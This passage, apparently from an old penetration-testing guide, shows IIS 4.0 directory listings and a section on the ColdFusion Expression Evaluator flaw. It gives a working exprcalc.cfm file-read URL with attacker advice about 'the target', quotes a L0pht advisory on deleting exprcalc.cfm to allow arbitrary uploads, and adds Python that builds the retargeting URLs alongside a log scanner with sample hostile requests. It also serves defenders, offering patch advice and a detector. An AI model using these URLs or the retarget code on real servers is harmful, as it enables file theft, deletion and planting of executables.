10/12/97 06:40a 170 gnicdis.gif
10/12/97 06:40a 879 gnicdoc.gif
10/12/97 06:40a 862 gnicdown.gif
10/12/97 06:40a 871 gnicdsal.gif
10/12/97 06:40a 149 gnicedit.gif
10/12/97 06:40a 904 gnichelp.gif
10/12/97 06:40a 877 gnickey.gif
10/12/97 06:40a 145 gniclock.gif
10/12/97 06:40a 1,231 gniclogo.gif
10/12/97 06:40a 914 about.gif
10/12/97 06:40a 242 access.gif
10/12/97 06:40a 1,010 back.gif
10/12/97 06:40a 909 bkclos.gif
10/12/97 06:40a 932 bkopen.gif
10/12/97 06:40a 832 black.gif
10/12/97 06:40a 65 blank.gif
10/12/97 06:40a 66 blankl.gif
10/12/97 06:40a 880 brws.gif
10/12/97 06:40a 156 cert.gif
10/12/97 06:40a 80 checkoff.gif
10/12/97 06:40a 89 checkon.gif
10/12/97 06:40a 880 cncl.gif
10/12/97 06:40a 129 comp.gif
10/12/97 06:40a 158 comp0.gif
10/12/97 06:40a 158 comp1.gif
10/12/97 06:40a 158 comp2.gif
10/12/97 06:40a 127 comp3.gif
10/12/97 06:40a 131 comp4.gif
10/12/97 06:40a 882 cont.gif
10/12/97 06:39a 1,133 custrecp.gif
10/12/97 06:40a 165 dir0.gif
10/12/97 06:40a 165 dir2.gif
10/12/97 06:40a 165 dir4.gif
10/12/97 06:39a 1,117 distlist.gif
10/12/97 06:40a 879 doc.gif
10/12/97 06:40a 159 drct.gif
10/12/97 06:40a 879 edit.gif
10/12/97 06:40a 152 folder.gif
10/12/97 06:40a 175 ftp0.gif
10/12/97 06:40a 173 ftp2.gif
124 File(s) 110,848 bytes

Directory of C:\INETPUB\scripts

05/12/99 03:17p <DIR> .
05/12/99 03:17p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\ftproot

05/12/99 03:18p <DIR> .
05/12/99 03:18p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\Catalog.wci

05/12/99 03:18p <DIR> .
05/12/99 03:18p <DIR> ..
05/12/99 03:24p 240 CiSP0000.000
05/12/99 03:24p 65,536 CiSP0000.001
05/12/99 03:24p 65,536 CiSP0000.002
05/12/99 03:24p 240 CiPS0000.000
05/12/99 03:24p 65,536 CiPS0000.001
05/12/99 03:24p 65,536 CiPS0000.002
05/12/99 03:24p 240 CiPT0000.000
05/12/99 03:24p 65,536 CiPT0000.001
05/12/99 03:24p 65,536 CiPT0000.002
05/12/99 03:24p 240 CiST0000.000
05/12/99 03:25p 65,536 CiST0000.001
05/12/99 03:25p 65,536 CiST0000.002
05/13/99 06:27a 4,198,912 propstor.bkp
05/12/99 03:24p 131,072 cicat.hsh
05/12/99 03:24p 240 CiVP0000.000
05/12/99 03:24p 65,536 CiVP0000.001
05/12/99 03:24p 65,536 CiVP0000.002
05/12/99 03:24p 240 INDEX.000
05/12/99 03:24p 65,536 INDEX.001
05/12/99 03:24p 65,536 INDEX.002
05/12/99 03:24p 240 CiCL0001.000
05/12/99 03:24p 131,072 CiCL0001.001
05/12/99 03:24p 131,072 CiCL0001.002
05/12/99 03:24p 240 CiSL0001.000
05/12/99 03:24p 0 CiSL0001.001
05/12/99 03:24p 0 CiSL0001.002
05/12/99 03:24p 2,162,688 00000002.prp
05/14/99 12:06a 3,051,520 00010001.ci
05/14/99 12:06a 24,415 00010001.dir
05/14/99 12:06a 240 CiFLfffc.000
05/14/99 12:06a 65,536 CiFLfffc.001
05/14/99 12:06a 65,536 CiFLfffc.002
34 File(s) 10,750,415 bytes

Total Files Listed:
463 File(s) 12,035,314 bytes
590,512,128 bytes free

IIS 4.0 WWW Server Hidden Files and Directories (the _vti_* directories are created by the
FrontPage Server Extensions and carry the hidden attribute, which is why they are absent from
the wwwroot entry list above):

Volume in drive C has no label.
Volume Serial Number is EA37-8613

Directory of C:\INETPUB\wwwroot

05/12/99 03:23p <DIR> _vti_pvt
05/12/99 03:23p <DIR> _vti_log
05/12/99 03:23p <DIR> _vti_txt
05/12/99 03:23p <DIR> _vti_cnf
05/12/99 03:23p <DIR> _vti_bin
5 File(s) 0 bytes

Directory of C:\INETPUB\wwwroot\_vti_bin

05/12/99 03:23p <DIR> _vti_adm
05/12/99 03:23p <DIR> _vti_aut
2 File(s) 0 bytes

Directory of C:\INETPUB\wwwroot\cgi-bin

05/12/99 03:23p <DIR> _vti_cnf
1 File(s) 0 bytes

Total Files Listed:
8 File(s) 0 bytes
590,479,360 bytes free

ColdFusion

ColdFusion (Allaire, Inc.) allows database-to-web interaction and runs on many platforms.
It is commonly found on Windows NT, because of the ease of administration there and because
Microsoft Access makes an easy back-end database. Several vulnerabilities exist for the product.

http://XXX.XXX.XXX.XXX/cfdocs/expeval/exprcalc.cfm?OpenFilePath=d:\winnt\repair\setup.log

This displays the named file, which can be any file the ColdFusion service account is able to
read. Be aware that, as the advisory quoted below explains, exprcalc.cfm deletes the file after
displaying it, so do not point it at anything the target cannot afford to lose.

L0pht has released an advisory on ColdFusion. This is included from the advisory
verbatim:

“By default, the Cold Fusion application server install program installs sample code as
well as online documentation. As part of this collection is a utility called the "Expression
Evaluator". The purpose of this utility is to allow developers to easily experiment with
Cold Fusion expressions. It even allows you to create a text file on your local machine
and then upload it to the application server in order to evaluate it. This utility is supposed
to be limited to the localhost.

There are basically 3 important files in this exploit that any web user can access by
default: "/cfdocs/expeval/openfile.cfm", "/cfdocs/expeval/displayopenedfile.cfm" and
"/cfdocs/expeval/exprcalc.cfm". The first one lets you upload a file via a web form. The
second one saves the file to the server. The last file reads the uploaded file, displays
the contents of the file in a web form and then deletes the uploaded file.

The Phrack article and the advisory from Allaire relate to "exprcalc.cfm". A web user can
choose to view and delete any file they want. To view and delete a file like
"c:\winnt\repair\setup.log" you would use a URL like:
http://www.server.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\repair\setup.log

This exploit can be taken a step further. First go to:

http://www.server.com/cfdocs/expeval/openfile.cfm

Select a file to upload from your local machine and submit it. You will then be forwarded
to a web page displaying the contents of the file you uploaded. The URL will look
something like:
http://www.server.com/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFilePath=C:\Inetpub\wwwroot\cfdocs\expeval\.\myfile.txt

Now replace the end of the URL where it shows ".\myfile.txt" with
"ExprCalc.cfm". Going to this URL will delete "ExprCalc.cfm" so that web users can
now use "openfile.cfm" to upload files to the web server without them being deleted.
With some knowledge of Cold Fusion a web user can upload a Cold Fusion page that
allows them to browse directories on the server as well as upload, download and delete
files. Arbitrary executable files could be placed anywhere the Cold Fusion service has
access. Web users are not restricted to the web root.

Frequently, Cold Fusion developers use Microsoft Access databases to store information
for their web applications. If the described vulnerability exists on your server, these
database files could potentially be downloaded and even overwritten with modified
copies.

The most concerning aspect of this vulnerability is that with a text editor and a web
browser, web users are able to download password files, other confidential information
and even upload executable files to a web server.

III. Solution

Allaire has posted a patch to this vulnerability. This is currently available at:
http://www.allaire.com/handlers/index.cfm?ID=8727&Method=Full
In addition to this, it is recommended that the documentation and example code not be
stored on production servers.”
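As an added example, not taken from the paper or from the L0pht advisory: the URL handling behind the procedure above, plus the defender's view of it. presence_urls() gives a non-destructive check (exprcalc.cfm is never asked to open anything), upload_dir() and retarget() perform the redirect-URL manipulation the advisory describes, and scan_log() flags hostile OpenFilePath values in web-server log lines. The host names, the log field layout and the log lines themselves are constructed for the example.

```python
"""URL handling and log review for the ColdFusion Expression Evaluator exposure.

Added example; not from the paper or the L0pht advisory.  Host names and the
log sample below are constructed.
"""
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

EXPEVAL = "/cfdocs/expeval/"
SAMPLE_FILES = ("openfile.cfm", "displayopenedfile.cfm", "exprcalc.cfm")


def presence_urls(base):
    """Non-destructive check: fetch the three pages bare (no OpenFilePath) and
    look for HTTP 200.  Asking exprcalc.cfm to open a file deletes that file."""
    return [base + EXPEVAL + name for name in SAMPLE_FILES]


def open_file_path(url):
    """OpenFilePath parameter of an ExprCalc.cfm URL, or None if absent."""
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if key.lower() == "openfilepath":
            return value
    return None


def upload_dir(url):
    """Directory an upload landed in, taken from the post-upload redirect URL;
    this discloses the web root's location on disk."""
    path = open_file_path(url)
    if path is None:
        return None
    segments = [s for s in path.replace("/", "\\").split("\\") if s not in ("", ".")]
    return "\\".join(segments[:-1]) + "\\"


def retarget(url, filename):
    """Point OpenFilePath at `filename` inside the upload directory.  With
    filename='ExprCalc.cfm' this is the advisory's self-deletion step."""
    parts = urlsplit(url)
    query = [(k, upload_dir(url) + filename if k.lower() == "openfilepath" else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(query, safe=":\\")))


def is_hostile(path_value):
    """True for OpenFilePath values that leave the evaluator's own directory
    (a '..' segment, or a path outside \\cfdocs\\expeval\\) or that name one of
    the evaluator's pages (the self-deletion trick)."""
    lowered = path_value.replace("/", "\\").lower()
    segments = [s for s in lowered.split("\\") if s not in ("", ".")]
    if ".." in segments or "cfdocs\\expeval" not in lowered:
        return True
    return bool(segments) and segments[-1] in SAMPLE_FILES


# Assumed W3C extended log layout; the #Fields line names the columns.
LOG_FIELDS = ["date", "time", "c-ip", "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status"]


def scan_log(lines):
    """(client ip, OpenFilePath) for every exprcalc.cfm request whose
    OpenFilePath is hostile; the evaluator's own post-upload request is benign."""
    hits = []
    for line in lines:
        fields = line.split()
        if not fields or fields[0].startswith("#") or len(fields) < len(LOG_FIELDS):
            continue
        rec = dict(zip(LOG_FIELDS, fields))
        if not rec["cs-uri-stem"].lower().endswith("/cfdocs/expeval/exprcalc.cfm"):
            continue
        path = open_file_path("?" + rec["cs-uri-query"])
        if path and is_hostile(path):
            hits.append((rec["c-ip"], path))
    return hits


# Constructed log lines (not from a real server) following the chain in the
# advisory: upload, legitimate redirect, file theft, then self-deletion.
SAMPLE_LOG = r"""
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
1999-05-14 10:01:02 10.0.0.5 GET /cfdocs/expeval/openfile.cfm - 200
1999-05-14 10:01:09 10.0.0.5 GET /cfdocs/expeval/ExprCalc.cfm RequestTimeout=2000&OpenFilePath=C:\Inetpub\wwwroot\cfdocs\expeval\.\myfile.txt 200
1999-05-14 10:02:41 10.0.0.5 GET /cfdocs/expeval/ExprCalc.cfm OpenFilePath=c:\winnt\repair\setup.log 200
1999-05-14 10:03:00 10.0.0.5 GET /cfdocs/expeval/ExprCalc.cfm OpenFilePath=C:\Inetpub\wwwroot\cfdocs\expeval\ExprCalc.cfm 200
""".strip().splitlines()
```

scan_log(SAMPLE_LOG) returns two hits, the setup.log read and the self-deletion request, and leaves the evaluator's own redirect alone; the same function can be pointed at the INyymmdd.log files in \WINNT\System32\LogFiles once the field order from their #Fields line is confirmed.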
